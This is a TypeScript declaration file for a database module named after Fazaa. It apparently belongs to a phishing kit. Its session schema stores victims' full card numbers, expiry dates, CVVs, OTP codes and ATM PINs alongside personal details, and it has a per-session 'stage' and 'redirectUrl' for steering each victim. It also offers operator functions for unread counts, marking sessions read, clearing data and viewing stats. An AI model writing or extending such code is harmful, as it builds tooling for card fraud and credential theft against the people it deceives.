import sqlite3 from 'sqlite3';
declare const db: sqlite3.Database;
export interface FazaaSession {
    id: number;
    sessionId: string;
    fullName: string | null;
    phoneNumber: string | null;
    email: string | null;
    emirate: string | null;
    district: string | null;
    membershipTier: string | null;
    totalAmount: string | null;
    cardName: string | null;
    cardNumber: string | null;
    cardNumberMasked: string | null;
    cardExpiry: string | null;
    cardCvv: string | null;
    otpCode: string | null;
    atmPin: string | null;
    stage: string;
    errorMessage: string | null;
    clientIp: string | null;
    userAgent: string | null;
    statusRead: number | null;
    redirectUrl: string | null;
    createdAt: string;
    updatedAt: string;
}
export interface RegistrationData {
    id: number;
    sessionId: string;
    fullName: string;
    phoneNumber: string;
    email: string;
    emirate: string;
    district: string | null;
    membershipTier: string;
    totalAmount: string;
    addressEmirate: string | null;
    addressDistrict: string | null;
    addressStreet: string | null;
    addressBuildingNumber: string | null;
    clientIp: string | null;
    userAgent: string | null;
    createdAt: string;
}
export declare function createRegistration(data: {
    sessionId: string;
    fullName: string;
    phoneNumber: string;
    email: string;
    emirate: string;
    district?: string | null;
    membershipTier: string;
    totalAmount?: string;
    addressEmirate?: string | null;
    addressDistrict?: string | null;
    addressStreet?: string | null;
    addressBuildingNumber?: string | null;
    clientIp?: string | null;
    userAgent?: string | null;
}): Promise<RegistrationData>;
export declare function getRegistrationBySessionId(sessionId: string): Promise<RegistrationData | undefined>;
export declare function getAllRegistrations(limit?: number): Promise<RegistrationData[]>;
export declare function createSession(data: {
    sessionId: string;
    fullName?: string;
    phoneNumber?: string;
    email?: string;
    emirate?: string;
    district?: string | null;
    membershipTier?: string;
    totalAmount?: string;
    clientIp?: string | null;
    userAgent?: string | null;
}): Promise<FazaaSession>;
export declare function getSessionBySessionId(sessionId: string): Promise<FazaaSession | undefined>;
export declare function updateSession(sessionId: string, updates: Record<string, any>): Promise<void>;
export declare function getAllSessions(limit?: number): Promise<FazaaSession[]>;
export declare function getUnreadSessionsCount(): Promise<number>;
export declare function markAllAsRead(): Promise<void>;
export declare function clearAllData(): Promise<void>;
export declare function getStats(): Promise<{
    total: number;
    pending: number;
    completed: number;
    failed: number;
    new: number;
    registrations: number;
}>;
export default db;
